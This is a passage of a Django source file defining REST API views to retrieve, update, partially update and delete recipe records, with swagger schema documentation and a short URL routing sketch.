""",
},
tags=['Recipe'],
)
def get(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
serializer = RecipeSerializer(data)
return JSONResponse(serializer.data)
@csrf_exempt
@swagger_auto_schema(
operation_description="Updates a Recipe object with a given id.",
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=['name'],
properties={
'name': openapi.Schema(
                description="The recipe's unique name.",
type=openapi.TYPE_STRING
),
'url': openapi.Schema(
description="""
The URL from which the recipe comes originally.
This URL will be used to download a pdf export of the recipe
to allow traceability and long term storage.
""",
type=openapi.TYPE_STRING
),
'note': openapi.Schema(
description="""
                    A descriptive text which might be helpful for finding the
                    recipe again when using the search functionality. You might
                    want to note what was good and bad; additional information
                    and significant facts are also useful for indexing.
""",
type=openapi.TYPE_STRING
),
'cuisine_ids': openapi.Schema(
description="""
                    A list of cuisines' unique ids in order to link an existing
cuisine to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'diet_ids': openapi.Schema(
description="""
                    A list of diets' unique ids in order to link an existing
diet to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'ingredient_ids': openapi.Schema(
description="""
                    A list of ingredients' unique ids in order to link an existing
ingredient to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'occasion_ids': openapi.Schema(
description="""
                    A list of occasions' unique ids in order to link an existing
occasion to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
},
),
responses={
200: RecipeSerializer(many=False),
400: """
The required request parameters are not met or an expected
object could not be retrieved from the data store.
""",
404: """
The object could not be updated, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def put(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
parsed_data = JSONParser().parse(request)
serializer = RecipeSerializer(
data,
data=parsed_data
)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
@csrf_exempt
@swagger_auto_schema(
operation_description="Updates a Recipe object with a given id.",
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=[],
properties={
'name': openapi.Schema(
                description="The recipe's unique name.",
type=openapi.TYPE_STRING
),
'url': openapi.Schema(
description="""
The URL from which the recipe comes originally.
This URL will be used to download a pdf export of the recipe
to allow traceability and long term storage.
""",
type=openapi.TYPE_STRING
),
'note': openapi.Schema(
description="""
                    A descriptive text which might be helpful for finding the
                    recipe again when using the search functionality. You might
                    want to note what was good and bad; additional information
                    and significant facts are also useful for indexing.
""",
type=openapi.TYPE_STRING
),
'cuisine_ids': openapi.Schema(
description="""
                    A list of cuisines' unique ids in order to link an existing
cuisine to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'diet_ids': openapi.Schema(
description="""
                    A list of diets' unique ids in order to link an existing
diet to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'ingredient_ids': openapi.Schema(
description="""
                    A list of ingredients' unique ids in order to link an existing
ingredient to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'occasion_ids': openapi.Schema(
description="""
                    A list of occasions' unique ids in order to link an existing
occasion to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
},
),
responses={
200: RecipeSerializer(many=False),
400: """
The required request parameters are not met or an expected
object could not be retrieved from the data store.
""",
404: """
The object could not be updated, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def patch(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
parsed_data = JSONParser().parse(request)
serializer = RecipeSerializer(
data,
data=parsed_data,
partial=True
)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
@csrf_exempt
@swagger_auto_schema(
operation_description="Deletes a Recipe object with a given id.",
responses={
            204: None,
404: """
The object could not be deleted, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def delete(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
data.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
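# A sketch of how these views might be wired up in a urls.py module (route
# paths and names here are assumptions; the project's actual routing module
# is not part of this file):
from django.urls import path

urlpatterns = [
    path('recipes/', RecipeListView.as_view(), name='recipe-list'),
    path('recipes/<int:pk>/', RecipeDetailView.as_view(), name='recipe-detail'),
]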
[dataset columns omitted: per-file line-length statistics and quality signals for the file above]